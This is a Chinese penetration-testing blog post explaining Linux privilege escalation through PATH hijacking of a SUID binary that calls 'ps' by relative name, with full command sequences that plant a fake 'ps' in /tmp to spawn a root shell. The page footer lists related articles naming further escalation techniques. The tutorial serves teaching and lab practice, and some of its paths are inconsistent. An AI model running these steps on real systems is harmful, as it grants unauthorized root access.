linnx环境变量提权

最新推荐文章于 2024-07-01 22:55:02 发布
最新推荐文章于 2024-07-01 22:55:02 发布
阅读量375 收藏
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43227251/article/details/117414565
版权

linnx环境变量提权

这个手法平时使用有点鸡肋,但是还是分享一下
前提是管理员要配置了suid权限的目录或文件

现在我们的当前目录是/home/hack/script,我们将在当前目录下创建一个srcipt目录。然后cd到script目录中,编写一个简单的c程序来调用系统二进制文件的函数。

pwd
mkdir script
cd /script
vim demo.c

#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");
}

在这里插入图片描述

ls
gcc demo.c -o shell
chmod u+s shell
ls -la shell

在这里插入图片描述

首先,你需要先入侵靶机系统并且进入到提权阶段。假设你已经通过ssh成功登录到了靶机上,二话不说,我们直接使用find命令来搜索具有SUID或4000权限的文件。

find / -perm -u=s -type f 2>/dev/null

通过执行上述命令,攻击者可以遍历任何可执行文件,在这里我们可以看到/home/raj/script目录下的shell文件具有SUID权限,如图:
在这里插入图片描述

于是我们cd到/home/hack/script 目录下,ls一下,看到了名为shell的可执行文件。我们运行一下这个文件,可以看到shell文件尝试执行ps命令,这个命令是/bin目录下的用来查看进程状态的真实文件。

ls
./shell

在这里插入图片描述

echo命令

cd /tmp
echo “/bin/bash” > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/hack/script
./shell
whoami

在这里插入图片描述

copy命令

cd /home/hack/script
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:$PATH
./shell
whoami

在这里插入图片描述
同理还有其他方式不一一列举了

qin9.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LINUX提权环境变量提权
Jinmindong
12-14 291
今天给大家带来了环境变量提权比较简单的方法不知道大家听明白了没有,环境变量提权中比较重要的就是结合suid权限来展开,本文只是简单列举了其中的几个方法,因为本人也很少用这种方法,可能理解的不是很到位望大佬们指点,如果喜欢本文不妨一键三连支持一下。
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统中,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux下SUID提权学习 - 从原理到使用
最新发布
Reset
07-01 887
linux的文件有普通权限和特殊权限(三种)。普通权限一般为:rwx,分别为读写执行,对应的数字表示为421。三种特殊权限为:suid权限,sgid权限,sticky权限。其中suid权限作用于文件属主,sgid权限作用于属组上,sticky权限作用于other其他上。
linux利用环境变量提权
m0_63917373的博客
05-04 286
linux环境变量提权 linux提权
linux 普通用户提权到root.docx
06-04
在 Linux 系统中,普通用户可以通过多种方式提权到 root,例如,使用 su 命令、使用 setuid 函数、使用 LD_PRELOAD 环境变量等。下面我们将详细介绍如何使用这些方法实现普通用户的提权。 1. 使用 su 命令 su 命令...
Linux利用UDF库实现Mysql提权
09-10
在Linux环境中,MySQL数据库系统允许用户通过UDF(User Defined Function)机制来扩展其功能,这意味着我们可以创建自己的函数库,将这些自定义函数整合到MySQL中。本篇将详细介绍如何利用UDF库来实现MySQL的提权...
linux提权代码
06-04
2. **环境变量利用**:恶意用户可能通过修改环境变量来触发提权,例如修改`LD_PRELOAD`来加载恶意库,或通过`PATH`变量重定向系统命令。 3. **服务漏洞**:很多系统服务默认运行在root权限下,如果存在安全漏洞,...
Linux下非交互式提权详解
09-15
本文主要讲解了在Linux环境下如何进行非交互式提权,并提供了相关工具和方法。在无法反弹shell的情况下,这种方法尤为实用,因为它允许在没有交互环境的情况下运行提权工具并检查结果。 首先,文章中提到了一个简单...
环境变量提权
leekos的博客,分享web安全相关知识~
08-16 191
PATH是Linux和类Unix操作系统中的环境变量,它指定了存储所有可执行程序的bin和sbin目录。当用户在终端运行任何命令时,它向shell发出请求,在环境变量的帮助下搜索可执行文件以响应用户执行的命令。超级用户通常还具有/sbin和/usr /sbin条目,以便轻松执行系统管理命令。使用echo命令就能轻易的查看和当前用户相关的环境变量
Linux环境变量提权
qq_58000413的博客
05-23 719
PATH是Linux和类Unix操作系统中的环境,它指定存储可 执行程序的所有bin和sbin目录。linux本地提权,漏洞范围:4.10 < linux内核版本 < 5.1.17。2、只能作用在二进制程序上,不能作用在 脚本上,且设置在目录上无意义。snap版本 2.28 < snapd < 2.37。3、执行suid权限的进程时,此用户将继承此程序的所有者权限。1、启动为进程之后,其进程的属主为原程序文件的属主。Linux包管理器snap本地提权漏洞。使用dirty.c脚本进行提权
linux在环境变量提权
qq_42430287的博客
04-13 290
1.介绍 PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命令时,它会通过PATH变量来响应用户执行的命令,并向shell发送请求以搜索可执行文件。超级用户通常还具有/sbin和/usr/sbin条目,以便于系统管理命令的执行。 使用echo命令显示当前PATH环境变量: echo $PATH /usr/local/bi...
环境变量提权
weixin_30725315的博客
02-14 118
有些应用程序使用了system等函数调用了系统命令,但是没有使用绝对路径而是使用env命令从环境变量中进行查找,这就可能通过修改环境变量来进行权限提升 看下面的例子,本例来自于nebula: //flag01.c #include <stdlib.h> #include <unistd.h> #include <string.h> #incl...
提权学习:Linux中使用环境变量进行提权
bylfsj的博客
10-15 1005
在这篇文章中,我将会为大家介绍一些使用环境变量进行Linux提权的方法,包括在CTF challenges中使用到一些的技术。话不多说,让我们进入正题! 介绍 PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命...
Linux环境变量劫持提权
Longwaer
01-02 3110
环境变量劫持提权: 本文通过查找SUID文件,劫持环境变量,从而使账号成功提权至root;本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。 ** 个人理解: 首先环境变量劫持提权的条件,就是系统中存在带有suid的文件,且这个 文件中必须有系统命令; 这样我们就可以命名一个和这个系统命令相同的文件,写入/bin
环境变量_环境变量提权
weixin_35044481的博客
12-31 121
文章来源:LemonSec 有些应用程序使用了system等函数调用了系统命令,但是没有使用绝对路径而是使用env命令从环境变量中进行查找,这就可能通过修改环境变量来进行权限提升看下面的例子,本例来自于nebula://flag01.c#include #include #include #include #include int main(int argc, char ...
linux环境变量提权原理
08-13
- *1* *2* [linux利用环境变量提权](https://blog.csdn.net/m0_63917373/article/details/130486423)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值